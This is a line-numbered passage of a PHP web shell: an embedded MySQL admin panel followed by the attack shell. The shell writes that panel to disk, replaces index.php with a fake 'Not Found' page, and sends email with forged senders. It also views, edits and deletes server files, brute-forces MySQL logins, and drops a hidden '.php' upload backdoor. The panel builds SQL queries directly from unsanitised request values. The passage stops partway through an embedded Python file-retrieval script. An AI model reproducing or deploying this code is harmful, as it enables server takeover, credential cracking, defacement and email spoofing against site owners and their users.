  1402.                     $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
  1403.         }
  1404.         $key = substr( $key, 0, strlen($key)-4 );
  1405.         mysql_select_db( $dbname, $mysqlHandle );
  1406.         $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
  1407.         $data = mysql_fetch_array( $pResult );
  1408.     }
  1409.     echo "<p class=location>$dbname &gt; $tablename</p>\n";
  1410.     echo "<form action='$PHP_SELF' method=post>\n";
  1411.     if( $cmd == "add" )
  1412.         echo "<input type=hidden name=action value=addData_submit>\n";
  1413.     else if( $cmd == "edit" )
  1414.         echo "<input type=hidden name=action value=editData_submit>\n";
  1415.     echo "<input type=hidden name=dbname value=$dbname>\n";
  1416.     echo "<input type=hidden name=tablename value=$tablename>\n";
  1417.     echo "<table cellspacing=1 cellpadding=2>\n";
  1418.     echo "<tr>\n";
  1419.     echo "<th>Name</th>\n";
  1420.     echo "<th>Type</th>\n";
  1421.     echo "<th>Function</th>\n";
  1422.     echo "<th>Data</th>\n";
  1423.     echo "</tr>\n";
  1424.     $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  1425.     $num = mysql_num_rows( $pResult );
  1426.     $pResultLen = mysql_list_fields( $dbname, $tablename );
  1427.     for( $i = 0; $i < $num; $i++ ) {
  1428.         $field = mysql_fetch_array( $pResult );
  1429.         $fieldname = $field["Field"];
  1430.         $fieldtype = $field["Type"];
  1431.         $len = mysql_field_len( $pResultLen, $i );
  1432.         echo "<tr>";
  1433.         echo "<td>$fieldname</td>";
  1434.         echo "<td>".$field["Type"]."</td>";
  1435.         echo "<td>\n";
  1436.         echo "<select name=${fieldname}_function>\n";
  1437.         echo "<option>\n";
  1438.         echo "<option>ASCII\n";
  1439.         echo "<option>CHAR\n";
  1440.         echo "<option>SOUNDEX\n";
  1441.         echo "<option>CURDATE\n";
  1442.         echo "<option>CURTIME\n";
  1443.         echo "<option>FROM_DAYS\n";
  1444.         echo "<option>FROM_UNIXTIME\n";
  1445.         echo "<option>NOW\n";
  1446.         echo "<option>PASSWORD\n";
  1447.         echo "<option>PERIOD_ADD\n";
  1448.         echo "<option>PERIOD_DIFF\n";
  1449.         echo "<option>TO_DAYS\n";
  1450.         echo "<option>USER\n";
  1451.         echo "<option>WEEKDAY\n";
  1452.         echo "<option>RAND\n";
  1453.         echo "</select>\n";
  1454.         echo "</td>\n";
  1455.         $value = htmlspecialchars($data[$i]);
  1456.         if( $cmd == "add" ) {
  1457.             $type = strtok( $fieldtype, " (,)\n" );
  1458.             if( $type == "enum" || $type == "set" ) {
  1459.                 echo "<td>\n";
  1460.                 if( $type == "enum" )
  1461.                     echo "<select name=$fieldname>\n";
  1462.                 else if( $type == "set" )
  1463.                     echo "<select name=$fieldname size=4 multiple>\n";
  1464.                 while( $str = strtok( "'" ) ) {
  1465.                     echo "<option>$str\n";
  1466.                     strtok( "'" );
  1467.                 }
  1468.                 echo "</select>\n";
  1469.                 echo "</td>\n";
  1470.             } else {
  1471.                 if( $len < 40 )
  1472.                     echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
  1473.                 else
  1474.                     echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
  1475.             }
  1476.         } else if( $cmd == "edit" ) {
  1477.             $type = strtok( $fieldtype, " (,)\n" );
  1478.             if( $type == "enum" || $type == "set" ) {
  1479.                 echo "<td>\n";
  1480.                 if( $type == "enum" )
  1481.                     echo "<select name=$fieldname>\n";
  1482.                 else if( $type == "set" )
  1483.                     echo "<select name=$fieldname size=4 multiple>\n";
  1484.                 while( $str = strtok( "'" ) ) {
  1485.                     if( $value == $str )
  1486.                         echo "<option selected>$str\n";
  1487.                     else
  1488.                         echo "<option>$str\n";
  1489.                     strtok( "'" );
  1490.                 }
  1491.                 echo "</select>\n";
  1492.                 echo "</td>\n";
  1493.             } else {
  1494.                 if( $len < 40 )
  1495.                     echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
  1496.                 else
  1497.                     echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
  1498.             }
  1499.         }
  1500.         echo "</tr>";
  1501.     }
  1502.     echo "</table><p>\n";
  1503.     if( $cmd == "add" )
  1504.         echo "<input type=submit value='Add Data'>\n";
  1505.     else if( $cmd == "edit" )
  1506.         echo "<input type=submit value='Edit Data'>\n";
  1507.     echo "<input type=button value='Cancel' onClick='history.back()'>\n";
  1508.     echo "</form>\n";
  1509. }
  1510.  
  1511. function manageData_submit( $cmd ) {
  1512.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
  1513.     $pResult = mysql_list_fields( $dbname, $tablename );
  1514.     $num = mysql_num_fields( $pResult );
  1515.     mysql_select_db( $dbname, $mysqlHandle );
  1516.     if( $cmd == "add" )
  1517.         $queryStr = "INSERT INTO $tablename VALUES (";
  1518.     else if( $cmd == "edit" )
  1519.         $queryStr = "REPLACE INTO $tablename VALUES (";
  1520.     for( $i = 0; $i < $num-1; $i++ ) {
  1521.         $field = mysql_fetch_field( $pResult );
  1522.         $func = $GLOBALS[$field->name."_function"];
  1523.         if( $func != "" )
  1524.             $queryStr .= " $func(";
  1525.         if( $field->numeric == 1 ) {
  1526.             $queryStr .= $GLOBALS[$field->name];
  1527.             if( $func != "" )
  1528.                 $queryStr .= "),";
  1529.             else
  1530.                 $queryStr .= ",";
  1531.         } else {
  1532.             $queryStr .= "'" . $GLOBALS[$field->name];
  1533.             if( $func != "" )
  1534.                 $queryStr .= "'),";
  1535.             else
  1536.                 $queryStr .= "',";
  1537.         }
  1538.     }
  1539.     $field = mysql_fetch_field( $pResult );
  1540.     if( $field->numeric == 1 )
  1541.         $queryStr .= $GLOBALS[$field->name] . ")";
  1542.     else
  1543.         $queryStr .= "'" . $GLOBALS[$field->name] . "')";
  1544.     mysql_query( $queryStr , $mysqlHandle );
  1545.     $errMsg = mysql_error();
  1546.     viewData( "" );
  1547. }
  1548.  
  1549. function deleteData() {
  1550.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
  1551.     $pResult = mysql_list_fields( $dbname, $tablename );
  1552.     $num = mysql_num_fields( $pResult );
  1553.     $key = "";
  1554.     for( $i = 0; $i < $num; $i++ ) {
  1555.         $field = mysql_fetch_field( $pResult, $i );
  1556.         if( $field->primary_key == 1 )
  1557.             if( $field->numeric == 1 )
  1558.                 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
  1559.             else
  1560.                 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
  1561.     }
  1562.     $key = substr( $key, 0, strlen($key)-4 );
  1563.     mysql_select_db( $dbname, $mysqlHandle );
  1564.     $queryStr =  "DELETE FROM $tablename WHERE $key";
  1565.     mysql_query( $queryStr, $mysqlHandle );
  1566.     $errMsg = mysql_error();
  1567.     viewData( "" );
  1568. }
  1569.  
  1570. function fetch_table_dump_sql($table)
  1571. {
  1572.     global $mysqlHandle,$dbname;
  1573.     mysql_select_db( $dbname, $mysqlHandle );
  1574.     $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
  1575.     $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
  1576.     $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";
  1577.     echo $tabledump;
  1578.     // get data
  1579.     $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
  1580.     $numfields=mysql_num_fields($rows);
  1581.     while ($row = mysql_fetch_array($rows, MYSQL_NUM))
  1582.     {
  1583.         $tabledump = "INSERT INTO $table VALUES(";
  1584.         $fieldcounter = -1;
  1585.         $firstfield = 1;
  1586.         // get each field's data
  1587.         while (++$fieldcounter < $numfields)
  1588.         {
  1589.             if (!$firstfield)
  1590.             {
  1591.                 $tabledump .= ', ';
  1592.             }
  1593.             else
  1594.             {
  1595.                 $firstfield = 0;
  1596.             }
  1597.             if (!isset($row["$fieldcounter"]))
  1598.             {
  1599.                 $tabledump .= 'NULL';
  1600.             }
  1601.             else
  1602.             {
  1603.                 $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
  1604.             }
  1605.         }
  1606.         $tabledump .= ");\n";
  1607.         echo $tabledump;
  1608.     }
  1609.     @mysql_free_result($rows);
  1610. }
  1611.  
  1612. function dump() {
  1613.     global $mysqlHandle, $action, $dbname, $tablename;
  1614.     if( $action == "dumpTable" ){
  1615.         header("Content-disposition: filename=$tablename.sql");
  1616.         header('Content-type: unknown/unknown');
  1617.         fetch_table_dump_sql($tablename);
  1618.         echo "\n\n\n";
  1619.         echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
  1620.         exit;
  1621.     }else{
  1622.         header("Content-disposition: filename=$dbname.sql");
  1623.         header('Content-type: unknown/unknown');
  1624.         mysql_select_db( $dbname, $mysqlHandle );
  1625.         $query_id = mysql_query("SHOW tables",$mysqlHandle);
  1626.         while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
  1627.         {
  1628.                 fetch_table_dump_sql($row[0]);
  1629.                 echo "\n\n\n";
  1630.                 echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
  1631.                 echo "\n\n\n";
  1632.         }
  1633.         echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
  1634.         exit;
  1635.     }
  1636. }
  1637.  
  1638. function utils() {
  1639.     global $PHP_SELF, $command;
  1640.     echo "<h1>Utilities</h1>\n";
  1641.     if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
  1642.         echo "<hr>\n";
  1643.         echo "Show\n";
  1644.         echo "<ul>\n";
  1645.         echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
  1646.         echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
  1647.         echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
  1648.         echo "</ul>\n";
  1649.         echo "Flush\n";
  1650.         echo "<ul>\n";
  1651.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
  1652.         if( $command == "flush_hosts" ) {
  1653.             if( mysql_query( "Flush hosts" ) != false )
  1654.                 echo "- Success";
  1655.             else
  1656.                 echo "- Fail";
  1657.         }
  1658.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
  1659.         if( $command == "flush_logs" ) {
  1660.             if( mysql_query( "Flush logs" ) != false )
  1661.                 echo "- Success";
  1662.             else
  1663.                 echo "- Fail";
  1664.         }
  1665.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
  1666.         if( $command == "flush_privileges" ) {
  1667.             if( mysql_query( "Flush privileges" ) != false )
  1668.                 echo "- Success";
  1669.             else
  1670.                 echo "- Fail";
  1671.         }
  1672.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
  1673.         if( $command == "flush_tables" ) {
  1674.             if( mysql_query( "Flush tables" ) != false )
  1675.                 echo "- Success";
  1676.             else
  1677.                 echo "- Fail";
  1678.         }
  1679.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
  1680.         if( $command == "flush_status" ) {
  1681.             if( mysql_query( "Flush status" ) != false )
  1682.                 echo "- Success";
  1683.             else
  1684.                 echo "- Fail";
  1685.         }
  1686.         echo "</ul>\n";
  1687.     } else {
  1688.         $queryStr = ereg_replace( "_", " ", $command );
  1689.         $pResult = mysql_query( $queryStr );
  1690.         if( $pResult == false ) {
  1691.             echo "Fail";
  1692.             return;
  1693.         }
  1694.         $col = mysql_num_fields( $pResult );
  1695.         echo "<p class=location>$queryStr</p>\n";
  1696.         echo "<hr>\n";
  1697.         echo "<table cellspacing=1 cellpadding=2 border=0>\n";
  1698.         echo "<tr>\n";
  1699.         for( $i = 0; $i < $col; $i++ ) {
  1700.             $field = mysql_fetch_field( $pResult, $i );
  1701.             echo "<th>".$field->name."</th>\n";
  1702.         }
  1703.         echo "</tr>\n";
  1704.         while( 1 ) {
  1705.             $rowArray = mysql_fetch_row( $pResult );
  1706.             if( $rowArray == false ) break;
  1707.             echo "<tr>\n";
  1708.             for( $j = 0; $j < $col; $j++ )
  1709.                 echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
  1710.             echo "</tr>\n";
  1711.         }
  1712.         echo "</table>\n";
  1713.     }
  1714. }
  1715. function footer_html() {
  1716.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
  1717.     echo "<hr>\n";
  1718.     echo "<span class=\"new\">[$USERNAME]</span> - \n";
  1719.     echo "<a href='$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \n";
  1720.     if( $tablename != "" )
  1721.         echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
  1722.     echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
  1723.     echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
  1724. }
  1725. //------------- MAIN ------------- //
  1726. error_reporting(0);
  1727. ini_set ('display_errors', 0);
  1728. ini_set ('log_errors', 0);
  1729. if( $action == "logon" || $action == "" || $action == "logout" )
  1730.     logon();
  1731. else if( $action == "bG9nb25fc3VibWl0" )
  1732.     logon_submit();
  1733. else if( $action == "dumpTable" || $action == "dumpDB" ) {
  1734.     while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
  1735.         if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
  1736.         if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
  1737.         if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
  1738.     }
  1739.     $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
  1740.     dump();
  1741. } else {
  1742.     while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
  1743.         if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
  1744.         if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
  1745.         if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
  1746.     }
  1747.     echo "<!--";
  1748.     $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
  1749.     echo "-->";
  1750.     if( $mysqlHandle == false ) {
  1751.         echo "<table width=100% height=100%><tr><td><center>\n";
  1752.         echo "<h1>Wrong Password!</h1>\n";
  1753.         echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
  1754.         echo "</center></td></tr></table>\n";
  1755.     } else {
  1756.         if( $action == "bGlzdERCcw==" )
  1757.             listDatabases();
  1758.         else if( $action == "createDB" )
  1759.             createDatabase();
  1760.         else if( $action == "dropDB" )
  1761.             dropDatabase();
  1762.         else if( $action == "listTables" )
  1763.             listTables();
  1764.         else if( $action == "createTable" )
  1765.             createTable();
  1766.         else if( $action == "dropTable" )
  1767.             dropTable();
  1768.         else if( $action == "viewSchema" )
  1769.             viewSchema();
  1770.         else if( $action == "query" )
  1771.             viewData( $queryStr );
  1772.         else if( $action == "addField" )
  1773.             manageField( "add" );
  1774.         else if( $action == "addField_submit" )
  1775.             manageField_submit( "add" );
  1776.         else if( $action == "editField" )
  1777.             manageField( "edit" );
  1778.         else if( $action == "editField_submit" )
  1779.             manageField_submit( "edit" );
  1780.         else if( $action == "dropField" )
  1781.             dropField();
  1782.         else if( $action == "dmlld0RhdGE=" )
  1783.             viewData( "" );
  1784.         else if( $action == "addData" )
  1785.             manageData( "add" );
  1786.         else if( $action == "addData_submit" )
  1787.             manageData_submit( "add" );
  1788.         else if( $action == "editData" )
  1789.             manageData( "edit" );
  1790.         else if( $action == "editData_submit" )
  1791.             manageData_submit( "edit" );
  1792.         else if( $action == "deleteData" )
  1793.             deleteData();
  1794.         else if( $action == "utils" )
  1795.             utils();
  1796.         mysql_close( $mysqlHandle);
  1797.         footer_html();
  1798.     }
  1799. }
  1800. ?>
  1801. <html>
  1802. <head>
  1803. <title>MySQL Interface (Developed By Mohajer22)</title>
  1804. <body bgColor=#000000 >
  1805. <style type="text/css">
  1806. <!--
  1807. p.location {
  1808.     color: #00FF00;
  1809. }
  1810. h1, h2, h3 {
  1811.     color: #00FF00;
  1812. }
  1813. th {
  1814.     background-color: #222222;
  1815.     color: #00FF00;
  1816.     font-size: small;
  1817. }
  1818. td {
  1819.     color: #00FF00;
  1820.     background-color: #444444;
  1821.     font-size: small;
  1822. }
  1823. form {
  1824.     margin-top: 0;
  1825.     margin-bottom: 0;
  1826. }
  1827. a {
  1828.     text-decoration:none;
  1829.     color: #00FF00;
  1830.     font-size:small;
  1831. }
  1832. A:link {
  1833. COLOR:#FFFFFF;
  1834. TEXT-DECORATION: none
  1835. }
  1836. A:visited {
  1837. COLOR:#00FF00;
  1838. TEXT-DECORATION: none
  1839. }
  1840. A:active {
  1841. COLOR:#00FF00;
  1842. TEXT-DECORATION: none
  1843. }
  1844. A:hover {
  1845. color:#00FF00;
  1846. TEXT-DECORATION: none
  1847. }
  1848. input, select, textarea {
  1849. background-color: #000000;
  1850. border-style: solid;
  1851. font-family: Tahoma,Verdana,Arial,Sans-Serif;
  1852. font-size:small;
  1853. color: #00FF00;
  1854. padding: 0px;
  1855. }
  1856. li {
  1857. color: #00FF00;
  1858. }
  1859. .new {
  1860. color: #00FF00;
  1861. }
  1862. //-->
  1863. </style>
  1864. </head>'; $file = fopen("db-sql.php" ,"w+"); $write = fwrite ($file ,base64_decode($sqlshell)); fclose($file); chmod("db-sql.php", 0644); $indexshell = fopen("index.php" ,"w+"); $data = '<h1>Not Found</h1>
  1865. <p>The requested URL was not found on this server.</p>
  1866. <hr>
  1867. <address>Apache Server at <?=$_SERVER['hxxp_HOST']?> Port 80</address>
  1868.     <style>
  1869.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  1870.     </style>'; $tulis = fwrite( $indexshell, base64_decode($data)); fclose($indexshell); echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?>
  1871. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  1872. <table class="cmdbox">
  1873. <tr><td>
  1874. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me A.S.A.P</textarea>
  1875. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr>
  1876. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="BlackEagle@fbi.gov" name="mail_from" />&nbsp; from</td></tr>
  1877. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
  1878. <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
  1879. <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>
  1880. </table>
  1881. </form>
  1882.  
  1883. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  1884.     <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
  1885.     <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  1886.         <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  1887.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  1888.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1889.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  1890.     </form>
  1891.     </td></tr>
  1892.     <tr><td>Size</td><td>".ukuran($file)."</td></tr>
  1893.     <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
  1894.     <tr><td>Owner</td><td>".$owner."</td></tr>
  1895.     <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  1896.     <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  1897.     <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  1898.     <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  1899.     <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
  1900.     </table>
  1901.     "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
  1902. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  1903. <table class="cmdbox">
  1904. <tr><td colspan="2">
  1905. <textarea class="output" name="content">
  1906. <?php echo $content; ?>
  1907. </textarea>
  1908. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
  1909. &nbsp;<?php echo $msg; ?></td></tr>
  1910. </table>
  1911. </form>
  1912. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')) { ?>
  1913. <form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">
  1914.  
  1915. <?php  unset($_SESSION[md5($_SERVER['hxxp_HOST'])]); echo 'bye!'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) { ?>
  1916.                 <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  1917.             <?php  ?>
  1918. <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
  1919. <?php  @set_time_limit(0); @error_reporting(0); if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("\n",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Gca~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />"; $ok++; } } } } echo "<hr><b>You Found <font color=green>$ok</font> Cpanel</b>"; echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['hxxp_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "<?php
  1920. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1921. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1922. if( $_POST['_upl'] == "Upload" ) {
  1923. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Upload Shell Korang!!!<b><br><br>'; }
  1924. else { echo '<b>Korang Gagal Upload Shell Korang!!!</b><br><br>'; }
  1925. }
  1926. ?>"; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = '#!/usr/bin/env python
  1927.  
  1928. '''
  1929. By: Ahmed Shawky aka lnxg33k
  1930. thx: Obzy, Relik, mohab and #arabpwn
  1931. '''
  1932.  
  1933. import sys
  1934. import os
  1935. import re
  1936. import subprocess
  1937. import urllib
  1938. import glob
  1939. from platform import system
  1940.  
  1941. if len(sys.argv) != 3:
  1942.   print''' 
  1943.  Usage: %s [URL...] [directory...]
  1944.  Ex) %s hxxp://www.test.com/test/ [dir ...]''' % (sys.argv[0], sys.argv[0])
  1945.   sys.exit(1)
  1946.  
  1947. site = sys.argv[1]
  1948. fout = sys.argv[2]
  1949.  
  1950. try:
  1951.   req  = urllib.urlopen(site)
  1952.   read = req.read()
  1953.   if system() == 'Linux':
  1954.     f = open('/tmp/data.txt', 'w')
  1955.     f.write(read)
  1956.     f.close()
  1957.   if system() == 'Windows':
  1958.     f = open('data.txt', 'w')  
  1959.     f.write(read)
  1960.     f.close()
  1961.  
  1962.   i = 0
  1963.   if system() == 'Linux':
  1964.     f = open('/tmp/data.txt', 'rU')
  1965.     for line in f:
  1966.       if line.startswith('<li><a') == True :
  1967.         m = re.search(r'(<a href=")(.+[^>])(">)', line)
  1968.         i += 1
  1969.         local_name = '%s/file%d.txt' % (fout, i)
  1970.         print 'Retrieving...\t\t', site + m.group(2)
  1971.         try:  urllib.urlretrieve(site + m.group(2), local_name)
  1972.         except IOError:
  1973.           print '\n[%s] doesn\'t exist, create it first' % fout
  1974.           sys.exit()
  1975.       if line.startswith('<img') == True:
  1976.         m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
  1977.         i += 1
  1978.         local_name = '%s/file%d.txt' % (fout, i)
  1979.         print 'Retrieving...\t\t', site + m1.group(2)
  1980.         try:  urllib.urlretrieve(site + m1.group(2), local_name)
  1981.         except IOError:
  1982.           print '\n[%s] doesn\'t exist, create it first' % fout
  1983.           sys.exit()
  1984.       if line.startswith('<IMG') == True:
  1985.         m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
  1986.         i += 1
  1987.         local_name = '%s/file%d.txt' % (fout, i)
  1988.         print 'Retrieving...\t\t', site + m2.group(2)
  1989.         try:  urllib.urlretrieve(site + m2.group(2), local_name)
  1990.         except IOError:
  1991.           print '\n[%s] doesn\'t exist, create it first' % fout
  1992.           sys.exit()
  1993.     f.close()
  1994.   if system() == 'Windows':
  1995.     f = open('data.txt', 'rU')
  1996.     for line in f:
  1997.       if line.startswith('<li><a') == True :
  1998.         m = re.search(r'(<a href=")(.+[^>])(">)', line)
  1999.         i += 1
  2000.         local_name = '%s/file%d.txt' % (fout, i)
  2001.         print 'Retrieving...\t\t', site + m.group(2)
  2002.         try:  urllib.urlretrieve(site + m.group(2), local_name)
  2003.         except IOError:
  2004.           print '\n[%s] doesn\'t exist, create it first' % fout
  2005.           sys.exit()
  2006.       if line.startswith('<img') == True:
  2007.         m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
  2008.         i += 1
  2009.         local_name = '%s/file%d.txt' % (fout, i)
  2010.         print 'Retrieving...\t\t', site + m1.group(2)
  2011.         try:  urllib.urlretrieve(site + m1.group(2), local_name)
  2012.         except IOError:
  2013.           print '\n[%s] doesn\'t exist, create it first' % fout
  2014.           sys.exit()
  2015.       if line.startswith('<IMG') == True:
  2016.         m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
  2017.         i += 1
  2018.         local_name = '%s/file%d.txt' % (fout, i)
  2019.         print 'Retrieving...\t\t', site + m2.group(2)
  2020.         try:  urllib.urlretrieve(site + m2.group(2), local_name)
  2021.         except IOError:
  2022.           print '\n[%s] doesn\'t exist, create it first' % fout
  2023.           sys.exit()
  2024.     f.close()
  2025.   if system() == 'Linux':
